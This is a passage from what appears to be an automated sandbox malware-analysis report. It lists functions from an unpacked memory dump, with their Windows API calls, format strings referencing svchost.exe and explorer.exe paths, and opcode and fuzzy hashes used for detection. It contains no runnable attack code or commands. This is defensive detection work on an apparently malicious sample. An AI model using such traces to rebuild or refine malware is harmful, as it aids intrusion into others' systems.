                          • Opcode Fuzzy Hash: 59b72818c02ad9c66f209a0dfa9ef427c6eaac385237f59953ff017e171112e7
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CC9F Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 923f2690e53a1e9e59a38cd21ecfb9ec9b96ad37252adccc829242ddd140fc2d
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 923f2690e53a1e9e59a38cd21ecfb9ec9b96ad37252adccc829242ddd140fc2d
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CCB2 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 726fe5a15c6e3ed4538379076c4d21b316697b763511a6986fe77f809b4a26bb
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 726fe5a15c6e3ed4538379076c4d21b316697b763511a6986fe77f809b4a26bb
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CEB6 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: bc44ae451ed6c7b1307a31a309ac5ea6ca7e599d641f7a3b57ce190f045905c8
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: bc44ae451ed6c7b1307a31a309ac5ea6ca7e599d641f7a3b57ce190f045905c8
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041DE00 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 49memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00005004,?,00401633,0043E040,00000000), ref: 0041DE0D
                          • LocalAlloc.KERNEL32(00000040,00000000,?,?,00401633), ref: 0041DE37
                          • LocalFree.KERNEL32(00000000), ref: 0041DE74
                          • LocalFree.KERNEL32(00000000,?,?,00401633), ref: 0041DE7E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFree
                          • String ID: @C
                          • API String ID: 2012307162-1618053064
                          • Opcode ID: 414ae59593def5ab2f8fc855c7d7ef84a6a16e40d3485aa113c49327277a0ced
                          • Instruction ID: a03c80496656666fd240000d4683b53c919ffd3f4920f710f5485bbfcaab9ccc
                          • Opcode Fuzzy Hash: 414ae59593def5ab2f8fc855c7d7ef84a6a16e40d3485aa113c49327277a0ced
                          • Instruction Fuzzy Hash: 251133B5E00308EFCB04DFE4D849BDEB7B4EB58305F008569E6159B290D778AA84CF94
                          Function 0041D9C0 Relevance: 7.5, APIs: 5, Instructions: 48synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(?), ref: 0041D9F5
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041DA04
                          • CloseHandle.KERNEL32(?), ref: 0041DA11
                          • CloseHandle.KERNEL32(?), ref: 0041DA1E
                          • LocalFree.KERNEL32(00000000), ref: 0041DA38
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3879024238-0
                          • Opcode ID: de0fa354a8bf079bf6eb281e5a023c9c6e82e3ce10cf06fa8df24ade5fe33fdc
                          • Instruction ID: e8293441bbabc7d2dc90927d518e544b42cb184100bb40537d13b5f841ea70bc
                          • Opcode Fuzzy Hash: de0fa354a8bf079bf6eb281e5a023c9c6e82e3ce10cf06fa8df24ade5fe33fdc
                          • Instruction Fuzzy Hash: AC1106B9A04208EFCB04DF94D9889DDBBB5FF88311F248299E90997390C734AE84DB54
                          Function 0042A3AC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0042A3B8
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 0042A3CF
                          • __amsg_exit.LIBCMT ref: 0042A3DD
                          • __lock.LIBCMT ref: 0042A3ED
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0042A401
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                          • String ID:
                          • API String ID: 938513278-0
                          • Opcode ID: 502c2b2fb89e54d45840528a35472bab4a733277ef7d688bb02b0887a1ed57ea
                          • Instruction ID: a1cda5e7ab9d61d3e426a8a40c7ace11dbfad44217dc764019215e7f5c78a112
                          • Opcode Fuzzy Hash: 502c2b2fb89e54d45840528a35472bab4a733277ef7d688bb02b0887a1ed57ea
                          • Instruction Fuzzy Hash: 0CF06232F04730DBD621BBA9B44674D73A0AF00718F91415FED04A72D2CA6C5950DAAF
                          Function 00422230 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$MutexRelease
                          • String ID:
                          • API String ID: 2279609368-0
                          • Opcode ID: e822554bf4181ca65d3795211eddee638706090535dc2ce0247a697c814c7736
                          • Instruction ID: 862424a588e8dd2487d3b9dfc9e4d7e86187c93c22c59aea2a38e8b2ab33fc47
                          • Opcode Fuzzy Hash: e822554bf4181ca65d3795211eddee638706090535dc2ce0247a697c814c7736
                          • Instruction Fuzzy Hash: E3F01275A08104FFC758CBE4F84CB9EB7B4EF89301F50D5A9E61152250CB78A588DF28
                          Function 00408310 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • GetLastError.KERNEL32 ref: 0040834C
                          • __snwprintf.LIBCMT ref: 0040838E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$__snwprintf$ErrorLast
                          • String ID: %s%s$P
                          • API String ID: 3802810302-50959982
                          • Opcode ID: bc1b8c293ba201357ccb913cb72a36575da1c7da07590cb66db7a39783de867e
                          • Instruction ID: 73a450a735d616e95ec107ec45effab6a287e996992bc8ca54a5e87a77df302d
                          • Opcode Fuzzy Hash: bc1b8c293ba201357ccb913cb72a36575da1c7da07590cb66db7a39783de867e
                          • Instruction Fuzzy Hash: AD418C71D00209EBCB14DFE0D949BEEBB74EB48701F60463AE255B22D0DB785984CBA9
                          Function 00407150 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • __snwprintf.LIBCMT ref: 004071DD
                          • _memset.LIBCMT ref: 004071F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: 0MC$D
                          • API String ID: 2688013242-4244150477
                          • Opcode ID: 860fff2541f56bcf47d8d26c0c537dde594f71d5a132f6b973e5a3fb64b91166
                          • Instruction ID: 10cbdec7c9ac47424c67d3a6a1a6e2070451d315397af7c751663e227473bba2
                          • Opcode Fuzzy Hash: 860fff2541f56bcf47d8d26c0c537dde594f71d5a132f6b973e5a3fb64b91166
                          • Instruction Fuzzy Hash: 7331A275E44208BBDB14DBA0DC89FED7779EF48700F4001A9F209A62D0DAB95A84CB55
                          Function 00414490 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • __snwprintf.LIBCMT ref: 0041451D
                          • _memset.LIBCMT ref: 00414530
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: D$PdC
                          • API String ID: 2688013242-3338248644
                          • Opcode ID: fe8873d95505cb6751ff10fd3157c6c0e2ca1b70d4d3f1a1343b5945491f884f
                          • Instruction ID: 588705de2f19d31047822466ba8bb562fba55fce3293227ce1f551950129919c
                          • Opcode Fuzzy Hash: fe8873d95505cb6751ff10fd3157c6c0e2ca1b70d4d3f1a1343b5945491f884f
                          • Instruction Fuzzy Hash: 77318275A40204BBDB14DBA0DC49FED7779EB48700F5041A9F709A62D0DAB99AC4CB58
                          Function 004237C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyW.KERNEL32(0000001C,00473914), ref: 00423805
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: %s [%d]
                          • API String ID: 3722407311-2053052012
                          • Opcode ID: fb1d88b360f33a36618ed2c57b45f9f7639ef725057e385a61569c6b36f9ebf5
                          • Instruction ID: 3e2ef716702ff8af2041370b3f16d71dd1bfc4ff5dee9cabf348363d4275f40d
                          • Opcode Fuzzy Hash: fb1d88b360f33a36618ed2c57b45f9f7639ef725057e385a61569c6b36f9ebf5
                          • Instruction Fuzzy Hash: EE3172B4E00218AFC714DFA0EC4DBAD77B5EF48305F5081E9E509A7251D7789A84CF58
                          Function 0040F950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: %s\%s
                          • API String ID: 2688013242-4073750446
                          • Opcode ID: f9e56d3aa41bacb30b4bc2133f7ec09a247619fcba0ec4d2fda5b0f026a56986
                          • Instruction ID: 4184cf32529d506793041f360e4a7a16044ff04311cc4cd1caccecf4196b836d
                          • Opcode Fuzzy Hash: f9e56d3aa41bacb30b4bc2133f7ec09a247619fcba0ec4d2fda5b0f026a56986
                          • Instruction Fuzzy Hash: FA317C74A00208EBDB14DFE4DC49BAEB775EF88700F10857AE509A76D0D7B8A948CB59
                          Function 00414C84 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414D63
                          • CloseHandle.KERNEL32(00000000), ref: 00414DA5
                          • CloseHandle.KERNEL32(00000000), ref: 00414E07
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: 7bf6401253e6f631bd6c36b48544ad9e04f4c315d5b0184a5574e10b3e340590
                          • Instruction ID: d60757e844d62c9bc84a99f973ef0d3c017041af1da156204418206e71e7bf80
                          • Opcode Fuzzy Hash: 7bf6401253e6f631bd6c36b48544ad9e04f4c315d5b0184a5574e10b3e340590
                          • Instruction Fuzzy Hash: A241ED31A04524CFFB28CF28C898B95B772FB90309F1482E9D01E9F296C635AD95CF55
                          Function 00416E4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416EFC
                          • CloseHandle.KERNEL32(00000000), ref: 00416F32
                          • CloseHandle.KERNEL32(00000000), ref: 00416F82
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00416FEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: e324f94cbf851a2910fcf3c179efc2696829d54d2965bc7dca18b93eba61898c
                          • Instruction ID: f51066ab44949191618277d7d738a25aa9843502ef076337e26828cd42860881
                          • Opcode Fuzzy Hash: e324f94cbf851a2910fcf3c179efc2696829d54d2965bc7dca18b93eba61898c
                          • Instruction Fuzzy Hash: 2F317230604409CBFB1CCF98C698AAEBB72EBD030DF1542A9D0166F691C235FA95CB45
                          Function 00423520 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: und_memcpywsprintf
                          • String ID: 31B$31B
                          • API String ID: 2861580878-3187735358
                          • Opcode ID: 31ffe1f24cc8fb3647ddc14058845ad3ef99fb4cc49b8fe8ee175df2338c5ad5
                          • Instruction ID: b4ae27ccb64861e9f20b72aa9d35f228ba202a91c8d5a22e48184958d8549bad
                          • Opcode Fuzzy Hash: 31ffe1f24cc8fb3647ddc14058845ad3ef99fb4cc49b8fe8ee175df2338c5ad5
                          • Instruction Fuzzy Hash: AD21B6B1B00304ABCB04DFA4EC4AF9E73B8AF44705F404439F50D9B281E678EA44CB59
                          Function 004088C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408932
                          • __snwprintf.LIBCMT ref: 0040894E
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040895E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectorySystem__snwprintflstrcmpi
                          • String ID: %s\svchost.exe
                          • API String ID: 2474157625-1955667316
                          • Opcode ID: f140f3511efa23614a5a543a6e532cd2d95bbef54c98400a65d4e4f6287528cf
                          • Instruction ID: 84f6bcce6b4092c07673cefaacb6d186facc470a59003fe25131f87b18e2032c
                          • Opcode Fuzzy Hash: f140f3511efa23614a5a543a6e532cd2d95bbef54c98400a65d4e4f6287528cf
                          • Instruction Fuzzy Hash: 1E21B0B4A04209FBDB04AFE0DD49FAE7779EF48701F504079F605A72D0CA389944CB59
                          Function 004087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 00408832
                          • __snwprintf.LIBCMT ref: 0040884E
                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040885E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryWindows__snwprintflstrcmpi
                          • String ID: %s\explorer.exe
                          • API String ID: 127453217-2893622748
                          • Opcode ID: f9270bd1e24ab9dc883aea22219693d5cf2aa0688a95a53f135fea40c6b49bda
                          • Instruction ID: 3141bf42dfe8fa5b2e51042ad20096cfb300bb1e07b48db8893e0d2f84bdf8f8
                          • Opcode Fuzzy Hash: f9270bd1e24ab9dc883aea22219693d5cf2aa0688a95a53f135fea40c6b49bda
                          • Instruction Fuzzy Hash: 07217C75A00208FBDB18AFE0DD49EAE7779EF48701F9080B9F605A72D0CA789944CB18
                          Function 00414CC7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414D63
                          • CloseHandle.KERNEL32(00000000), ref: 00414DA5
                          • CloseHandle.KERNEL32(00000000), ref: 00414E07
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: 765d9590b46e21282e323ac144b6d05c2c903fc6e7ce717fb6fd441f0889dce7
                          • Instruction ID: 250e2fd052c42d83d58a107ee35c626be7e2054d6c92c19b6dde5c9cdca0a25a
                          • Opcode Fuzzy Hash: 765d9590b46e21282e323ac144b6d05c2c903fc6e7ce717fb6fd441f0889dce7
                          • Instruction Fuzzy Hash: A931C931A04424CBFB28CB28C998F95B772EB90309F1482E9D01EAB296C635AD95CF55
                          Function 00416E81 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416EFC
                          • CloseHandle.KERNEL32(00000000), ref: 00416F32
                          • CloseHandle.KERNEL32(00000000), ref: 00416F82
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00416FEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: 18227b46a8ccaeff8cf376f5b7dc665baa5299777fca2668b67ddfb68e98c635
                          • Instruction ID: a2053963612c7df701548f413a23bf0d8b665a46cc1246d76edfa23e3017fdb9
                          • Opcode Fuzzy Hash: 18227b46a8ccaeff8cf376f5b7dc665baa5299777fca2668b67ddfb68e98c635
                          • Instruction Fuzzy Hash: 643181306044098BFB1CCF98C698ABEB772EBD030DF254269D0266F695C235FD95CB55
                          Function 0041466F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004146EA
                          • CloseHandle.KERNEL32(00000000), ref: 00414707
                          • CloseHandle.KERNEL32(00000000), ref: 00414757
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414815
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: eb02805e49a25159c0565fb0f213c785163c53f9db9ebd391404e31c3de044db
                          • Instruction ID: 452fd7c3f545b44941b34f0a06ef3db5d32d18bca581c84b690aab980fb1c7e6
                          • Opcode Fuzzy Hash: eb02805e49a25159c0565fb0f213c785163c53f9db9ebd391404e31c3de044db
                          • Instruction Fuzzy Hash: EC312A31A04404DBFB18CF98C698AADBB72EBD030DF1442ADD0266F295C635EA95CB44
                          Function 0041407E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcscat$__snwprintf
                          • String ID: '%s'
                          • API String ID: 4289553879-2201965518
                          • Opcode ID: a20dd1b1dfba752180f8dd49261f106a7bb5618e1af8ed39c63cb2ecfb0330d7
                          • Instruction ID: 33df056c0529464a2baafdcece2817d9c0c4b0809bae14ddce2661c75d660747
                          • Opcode Fuzzy Hash: a20dd1b1dfba752180f8dd49261f106a7bb5618e1af8ed39c63cb2ecfb0330d7
                          • Instruction Fuzzy Hash: 17113970A4021CEBCB64DF40D889BE9B775EBA4304F20829AE5096A291C7789EC5CF95
                          Function 0041D170 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 0041D18D
                          • GetProcAddress.KERNEL32(00000000), ref: 0041D194
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NTDLL$RtlGetVersion
                          • API String ID: 1646373207-3678323915
                          • Opcode ID: 9354b5732965cfba0f5824ff44d8cb7257062b48f70c4c62bbb50e4734e20b80
                          • Instruction ID: 68295a6955420c89adeaee12c2ebc351c74c000644921af01294e337443e3b95
                          • Opcode Fuzzy Hash: 9354b5732965cfba0f5824ff44d8cb7257062b48f70c4c62bbb50e4734e20b80
                          • Instruction Fuzzy Hash: 7BF01CB09062189BCB249F60EC4A7D8BBB4AB0C311F0011E9A94862240CB785DE48F4C
                          Function 0041DD70 Relevance: 6.3, APIs: 5, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00009004), ref: 0041DD7D
                          • LocalAlloc.KERNEL32(00000040,?), ref: 0041DD97
                          • LocalFree.KERNEL32(00000000), ref: 0041DDCB
                          • LocalFree.KERNEL32(00000000), ref: 0041DDE2
                          • LocalFree.KERNEL32(00000000), ref: 0041DDEC
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc
                          • String ID:
                          • API String ID: 3098330729-0
                          • Opcode ID: 448e69a00867cb3d99b80f9324dcb5b1e8482b376d9da5e8c860b9a2f77f7773
                          • Instruction ID: b2d0350986e84b2eab800b3e685bf048c83aed6538ff149342eb06eccb43b414
                          • Opcode Fuzzy Hash: 448e69a00867cb3d99b80f9324dcb5b1e8482b376d9da5e8c860b9a2f77f7773
                          • Instruction Fuzzy Hash: 3811C3B5E00208EFDB04DFA4D949BDD77B4EB48305F108495FA1597390D634AA44CF58
                          Function 0041F280 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041FCA0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0041FCE9
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041F4D8
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFreeLocalVirtual
                          • String ID:
                          • API String ID: 3333721195-0
                          • Opcode ID: a892831002fac4f28295e6e7a85bd77b40102ac80ca255da5a90b50b025db13b
                          • Instruction ID: 15f4b76eb3a995c4f51aa39289b3a3923a2358189a1e878c7b3a25bb3c7b2905
                          • Opcode Fuzzy Hash: a892831002fac4f28295e6e7a85bd77b40102ac80ca255da5a90b50b025db13b
                          • Instruction Fuzzy Hash: 1D919474E00209DFCB14CF98C884AEEBBB1FF98304F24856AD815AB355D738A996CF54
                          Function 00402630 Relevance: 6.2, APIs: 4, Instructions: 187stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcmpiW.KERNEL32(?,-00476118,00000000,?,?,?,?,?), ref: 0040277C
                          • _memset.LIBCMT ref: 004027A1
                          • lstrcpyW.KERNEL32(?,-00476118,?,?,?,?,?,?,?), ref: 004027BF
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00402805
                            • Part of subcall function 00402AA0: construct.LIBCPMTD ref: 00402B29
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset_wcsrchrconstructlstrcmpi
                          • String ID:
                          • API String ID: 2078099069-0
                          • Opcode ID: c4e0003f20ac0bdd6235f8c1352beef51fc5a9158c7f5474fb38db59637b0dc0
